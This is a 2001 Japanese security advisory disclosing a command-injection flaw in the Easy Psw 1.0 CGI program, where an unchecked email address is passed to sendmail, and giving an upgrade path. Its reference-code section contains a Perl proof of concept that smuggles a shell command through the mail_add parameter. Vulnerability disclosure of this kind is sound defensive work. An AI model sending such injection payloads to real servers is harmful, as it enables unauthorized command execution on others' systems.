-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

======================================================================
CGI PROGRAM SECURITY ADVISORY  [EZ Psw 1.0]                 2001/04/14
======================================================================
http://www.ansi.co.jp/cgi/security/advisories/ez-psw_2001_04_14.txt
======================================================================

■ 影響を受けるCGIプログラム

* EASYアクセス制限・パスワード認証 & 自動発行 (Easy Psw) Ver. 1.0
  (これ以前の全てのバージョンには同様の問題が存在する可能性があります。)

■ 概要

EASYアクセス制限・パスワード認証 & 自動発行 は Hiroshi Ishikawa 氏によっ
て作成された CGI プログラムです。このプログラムには外部から任意のコマ
ンドが実行可能となるセキュリティ上の問題点があります。

EASYアクセス制限・パスワード認証 & 自動発行:
                                http://www.net-easy.com/psw/ezpsw.html

■ 解説

EASYアクセス制限・パスワード認証 & 自動発行 (Easy Psw) Ver. 1.0 では外
部から与えられたメールアドレスの汚染チェックを怠り、それを open 関数で
sendmail の引数として与えています。このため、悪意のある入力が行われた
場合には、外部から CGI プログラムの動作権限で任意のコマンドが実行可能
です。

■ 影響

CGIプログラムが各ユーザ権限で実行されるシステム (Apache + SuEXEC など)
の場合、そのユーザの権限で任意の操作をすることが可能です。これによって
ユーザ環境が破壊される可能性があります。そうではない場合でも、CGI プロ
グラムの実行 UID で任意の操作が可能です。

■ 回避方法

Ver. 1.1 に入れ替えることで、この問題を回避可能です。

■ 参考コード

#! /usr/bin/perl -w

use LWP::Simple;

getprint 'http://host/ezpsw/ezpsw11.cgi?' .
         'action=sakusei&id=misuzu&' .
         'mail_add=%3B+ls+-lR+>+/tmp/ls-lR%3B+misuzu@example.com';

__END__

■ 履歴

2001/04/10: 通知
2001/04/14: 修正を確認
2001/04/14: 公開
2001/04/27: 参考コードを追加

======================================================================

(C) 2001 ASUKA NETWORK SERVICE, INC.  http://www.ansi.co.jp/
         HIRATA YASUYUKI              http://yasu.asuka.net/
All rights reserved.

* この文書に書かれている内容は無保証です。
* この文書に書かれている内容を利用して攻撃を行った場合、刑事上・民事上
  の責任を問われることがあります。
* このファイルは内容の変更 (電子署名の除去を含む) が行われない限り自由
  に再配布可能です。

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7rqd8duP2KhBu8ikRAgGhAJ9/2i9UJjbo/IhxbSkwKe5PtMyqqACgnj4A
N5xFIhZBW0eA35Rs7DodDZqIPwMFATuup3zCitaZXxzdBBECAaEAnRVK3Ll+6jtH
vmUAFSipcs08J+CEAKC0Snrjq38OHUqidcP9oVUSCRsWdQ==
=ADdt
-----END PGP SIGNATURE-----